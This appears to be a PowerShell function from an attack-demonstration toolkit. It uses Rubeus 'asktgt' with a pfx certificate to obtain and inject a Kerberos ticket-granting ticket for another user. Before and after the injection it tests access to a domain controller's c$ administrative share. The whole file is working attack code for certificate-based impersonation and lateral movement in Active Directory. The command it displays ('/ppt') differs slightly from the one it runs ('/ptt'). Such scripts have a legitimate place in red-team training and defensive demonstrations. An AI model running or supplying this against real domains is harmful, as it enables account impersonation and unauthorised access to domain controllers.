Private/Get-KerberosTGT.ps1
|
function Get-KerberosTGT { ################################################################################ ##### ##### ##### Request a ticket-granting ticket (TGT) by using the pfx certificate ##### ##### ##### ################################################################################ Param([string] $pfxFile, [string] $altname) $CurrentFunction = Get-FunctionName Write-Log -Message "### Start Function $CurrentFunction ###" $StartRunTime = (Get-Date).ToString($Script:DateFormatLog) #################### main code | out- host ################## If (-not $SkipClearHost) { Clear-Host } Write-Host "____________________________________________________________________`n" Write-Host " FIRST try to connect to a DC c$ share " Write-Host "____________________________________________________________________`n" $directory = "\\$Script:ASDC\c$" Get-DirContent -Path $directory If (-not $UnAttended) { pause } If (-not $SkipClearHost) { Clear-Host } Write-Host "____________________________________________________________________`n" Write-Host " Request a ticket-granting ticket (TGT) by using the pfx certificate" Write-Host "____________________________________________________________________`n" $domain = $Script:AlternativeUser.FQDN $user = $Script:AlternativeUser.UPN Invoke-Output -Type CodeSnippet -Message "Command:" Write-Highlight -Text " .\Rubeus.exe ", "asktgt /user:", "$user", " /domain:", "$domain", " /certificate:", "MIACAQMwgAYJKoZ [..] AAAAA=", " /ppt /enctype:aes256" ` -Color $fgcC, $fgcS, $fgcV , $fgcS, $fgcV, $fgcS, $fgcV, $fgcS Write-Host "" If (-not $UnAttended) { pause } Invoke-Command -ScriptBlock { & "$($Script:ASTools)\Rubeus.exe" asktgt /user:$user /domain:$domain /certificate:$pfxFile /ptt /enctype:aes256 } | Out-Host If (-not $UnAttended) { pause } Write-Host "____________________________________________________________________`n" Write-Host " Now try again to connect to a DC c$ share " Write-Host "____________________________________________________________________`n" $directory = "\\$Script:ASDC\c$" Get-DirContent -Path $directory If (-not $UnAttended) { pause } If (-not $SkipClearHost) { Clear-Host } klist If (-not $UnAttended) { pause } Write-Log -Message " >> using $PfxFile" ######################## main code ############################ $runtime = Get-RunTime -StartRunTime $StartRunTime Write-Log -Message " Run Time: $runtime [h] ###" Write-Log -Message "### End Function $CurrentFunction ###" } |